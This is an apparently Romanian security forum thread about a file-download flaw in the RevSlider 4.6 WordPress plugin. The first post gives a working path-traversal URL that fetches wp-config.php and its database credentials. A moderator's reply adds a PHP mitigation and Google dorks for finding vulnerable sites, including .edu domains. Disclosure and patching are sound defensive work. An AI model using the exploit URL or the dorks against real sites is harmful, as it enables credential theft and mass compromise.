Jump to content
old66

RevSlider 4.6 - SECURITY VULNERABILITY

By old66, in Exploituri

Recommended Posts

old66 Newbie

old66

Posted
Posted (edited)

Oricine are un site WordPRess cu RevSlider 4.6 instalat, e bine sa citeasca.

Textul original aici:

There is a major security issue that is easy to exploit that requires an update to the plugin. Essentially all anyone has to do is enter the following url on a vulnerable website:

http://DOMAIN-HERE/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

That will download the wp-config.php file which includes your database credentials. I checked it on some of my sites and found several vulnerable. It is urgent that you update the plugin.

Steps to patch:

1. Download the latest version, here is a link straight from the developer 

https://www.dropbox.com/s/2m9taf90gheka5d/codecanyon-2751380-slider-revolution-responsive-wordpress-plugin.zip?dl=0

2. Log into the wordpress website that has the plugin installed

3. Click on the settings for the plugin and scroll to the very bottom

4. There will be a button on the right to update the plugin

5. Self explanatory from there

Do not delete the plugin and reupload because all your sliders will be lost.

After you download the latest from the link above, you have to unzip the file and in there you will see the plugin and all the documentation.

P.S. Nu am testat personal patch-ul .... inca.

Sursa: [GET] RevSlider 4.6 - URGENT SECURITY VULNERABILITY - Must read

Edited by old66
  • Upvote 2
Link to comment
Share on other sites
  • Moderators
Dragos Collaborator

Dragos

Posted
  • Moderators
Posted (edited)

Dublu post util.

Daca aveti aceeasi problema ca si mine ca Revolution Slider e bagat in template si nu-l puteti modifica fara sa modificati tot template-ul, luati de aici un plugin cu patch-ul pentru vulnerabilitate.

<?php
/*
Plugin Name: Patch pentru Revolution Slider
Author: Dragos
Description: Repara vulnerabilitatea de download din revolution slider.
Version: 1.0
*/

if(stristr($_SERVER["SCRIPT_FILENAME"],"/wp-admin/admin-ajax.php"))
{
	$file = preg_replace('/[^\da-zA-Z0-9 -_.]/i', '', $_GET['img']);
	$q = explode(".",$file);
	$acceptate = array("jpg","JPG","jpeg","gif","png","PNG","GIF");
	if (!in_array($q[count($q)-1],$acceptate) || !file_exists($file))
	{
		die("Access denied.");
	}
}

?>

Edited by Dragos
Link to comment
Share on other sites
  • Moderators
Dragos Collaborator

Dragos

Posted
  • Moderators
Posted (edited)

Asta e dork-ul bun cu 442000 de rezultate. Shit

inurl:revslider/views/templates/dialog_preview_slide.php

Edit, avem si edu-uri

allinurl:revslider/views/templates/dialog_preview_slide.php edu

EDIT: Pentru tinerii feciori care se apuca sa devina hackeri peste noapte, nu aveti ce face cu wp-configul daca nu aveti acces direct catre phpmyadmin sau catre panoul de administrare al bazei de date.

Edited by Dragos
Link to comment
Share on other sites
tromfil Newbie

tromfil

Posted
Posted

Problema pare a fi veche (adic? au comentat liniile, iar acum le-au readus live, deci ar trebui s? mearg? ?i pe versiuni mai vechi).

https://github.com/anattadesign/gunter/blob/master/wp-content/plugins/revslider/inc_php/image_view.class.php

$revSliderVersion = "2.2.4";

https://github.com/anattadesign/gunter/blob/master/wp-content/plugins/revslider/revslider.php

Func?iile astea sunt la fel de dubioase, dar n-am stat s? caut de pe unde vin. Cine are timp cel mai probabil mai g?se?te probleme grave în plugin.

                //------------------------------------------------------------------------------------------
                // download image, change size and name if needed.
                public function downloadImage($filename){
                        $filepath = $this->urlImages."/".$filename;
                        if(!is_file($filepath)) {
                                echo "file doesn't exists";
                                exit();
                        }

                        $this->outputImageForDownload($filepath,$filename);
                }

                //------------------------------------------------------------------------------------------
                // output image for downloading
                private function outputImageForDownload($filepath,$filename,$mimeType=""){              
                        $contents = file_get_contents($filepath);
                        $filesize = strlen($contents);

                        if($mimeType == ""){
                                $info = UniteFunctionsRev::getPathInfo($filepath);
                                $ext = $info["extension"];
                                $mimeType = "image/$ext";
                        }

                        header("Content-Type: $mimeType");      
                        header("Content-Disposition: attachment; filename=\"$filename\"");
                        header("Content-Length: $filesize");            
                        echo $contents;
                        exit();
                }

PS: Posibil s? gre?esc, n-am stat s? verific prea mult.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...